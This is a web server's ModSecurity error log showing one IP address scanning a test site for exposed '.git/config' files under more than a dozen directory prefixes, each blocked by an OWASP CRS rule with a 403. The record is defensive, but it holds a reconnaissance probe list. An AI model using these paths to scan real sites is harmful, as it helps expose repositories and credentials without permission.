[Fri May 24 12:48:30.139133 2024] [:error] [pid 3435531] [client 91.215.85.43:44864] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /config/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKAAAAAM"]
[Fri May 24 12:48:30.139636 2024] [:error] [pid 3435533] [client 91.215.85.43:44884] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backup/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAAAAAAU"]
[Fri May 24 12:48:30.139687 2024] [:error] [pid 3435531] [client 91.215.85.43:44864] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKAAAAAM"]
[Fri May 24 12:48:30.140095 2024] [:error] [pid 3435531] [client 91.215.85.43:44864] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKAAAAAM"]
[Fri May 24 12:48:30.140163 2024] [:error] [pid 3435533] [client 91.215.85.43:44884] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAAAAAAU"]
[Fri May 24 12:48:30.140576 2024] [:error] [pid 3435533] [client 91.215.85.43:44884] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAAAAAAU"]
[Fri May 24 12:48:30.143020 2024] [:error] [pid 3435532] [client 91.215.85.43:44916] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbgAAAAQ"]
[Fri May 24 12:48:30.143389 2024] [:error] [pid 3435532] [client 91.215.85.43:44916] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbgAAAAQ"]
[Fri May 24 12:48:30.143641 2024] [:error] [pid 3435532] [client 91.215.85.43:44916] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbgAAAAQ"]
[Fri May 24 12:48:30.143768 2024] [:error] [pid 3435529] [client 91.215.85.43:44926] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /qa/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGgAAAAE"]
[Fri May 24 12:48:30.144214 2024] [:error] [pid 3435529] [client 91.215.85.43:44926] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGgAAAAE"]
[Fri May 24 12:48:30.144673 2024] [:error] [pid 3435529] [client 91.215.85.43:44926] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/qa/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGgAAAAE"]
[Fri May 24 12:48:30.146050 2024] [:error] [pid 3435530] [client 91.215.85.43:44872] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-includes/js/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpQAAAAI"]
[Fri May 24 12:48:30.146405 2024] [:error] [pid 3435530] [client 91.215.85.43:44872] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpQAAAAI"]
[Fri May 24 12:48:30.146655 2024] [:error] [pid 3435530] [client 91.215.85.43:44872] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-includes/js/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpQAAAAI"]
[Fri May 24 12:48:30.147569 2024] [:error] [pid 3439794] [client 91.215.85.43:44910] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /m/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBQAAAAc"]
[Fri May 24 12:48:30.147900 2024] [:error] [pid 3439794] [client 91.215.85.43:44910] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBQAAAAc"]
[Fri May 24 12:48:30.148151 2024] [:error] [pid 3439794] [client 91.215.85.43:44910] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBQAAAAc"]
[Fri May 24 12:48:30.149492 2024] [:error] [pid 3439795] [client 91.215.85.43:44940] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repository/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgegAAAAg"]
[Fri May 24 12:48:30.149916 2024] [:error] [pid 3439795] [client 91.215.85.43:44940] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgegAAAAg"]
[Fri May 24 12:48:30.150253 2024] [:error] [pid 3439795] [client 91.215.85.43:44940] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgegAAAAg"]
[Fri May 24 12:48:30.150703 2024] [:error] [pid 3439796] [client 91.215.85.43:44966] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /src/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEgAAAAk"]
[Fri May 24 12:48:30.150868 2024] [:error] [pid 3439796] [client 91.215.85.43:44966] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEgAAAAk"]
[Fri May 24 12:48:30.150998 2024] [:error] [pid 3439796] [client 91.215.85.43:44966] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEgAAAAk"]
[Fri May 24 12:48:30.151146 2024] [:error] [pid 3435528] [client 91.215.85.43:44932] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repos/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dQAAAAA"]
[Fri May 24 12:48:30.151333 2024] [:error] [pid 3435528] [client 91.215.85.43:44932] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dQAAAAA"]
[Fri May 24 12:48:30.151482 2024] [:error] [pid 3435528] [client 91.215.85.43:44932] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dQAAAAA"]
[Fri May 24 12:48:30.152156 2024] [:error] [pid 3435645] [client 91.215.85.43:44896] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /shop/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAFwAAAAY"]
[Fri May 24 12:48:30.152303 2024] [:error] [pid 3435645] [client 91.215.85.43:44896] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAFwAAAAY"]
[Fri May 24 12:48:30.152434 2024] [:error] [pid 3435645] [client 91.215.85.43:44896] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/shop/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAFwAAAAY"]
[Fri May 24 12:48:30.238015 2024] [:error] [pid 3435532] [client 91.215.85.43:45194] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbwAAAAQ"]
[Fri May 24 12:48:30.238691 2024] [:error] [pid 3435532] [client 91.215.85.43:45194] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbwAAAAQ"]
[Fri May 24 12:48:30.239085 2024] [:error] [pid 3435532] [client 91.215.85.43:45194] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhbwAAAAQ"]
[Fri May 24 12:48:30.239920 2024] [:error] [pid 3435529] [client 91.215.85.43:45000] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /store/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGwAAAAE"]
[Fri May 24 12:48:30.240558 2024] [:error] [pid 3435529] [client 91.215.85.43:45000] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGwAAAAE"]
[Fri May 24 12:48:30.241112 2024] [:error] [pid 3435529] [client 91.215.85.43:45000] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/store/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMGwAAAAE"]
[Fri May 24 12:48:30.241679 2024] [:error] [pid 3435531] [client 91.215.85.43:44982] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /web/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKQAAAAM"]
[Fri May 24 12:48:30.242180 2024] [:error] [pid 3435531] [client 91.215.85.43:44982] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKQAAAAM"]
[Fri May 24 12:48:30.242397 2024] [:error] [pid 3435531] [client 91.215.85.43:44982] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKQAAAAM"]
[Fri May 24 12:48:30.242643 2024] [:error] [pid 3435533] [client 91.215.85.43:44960] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /new/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAQAAAAU"]
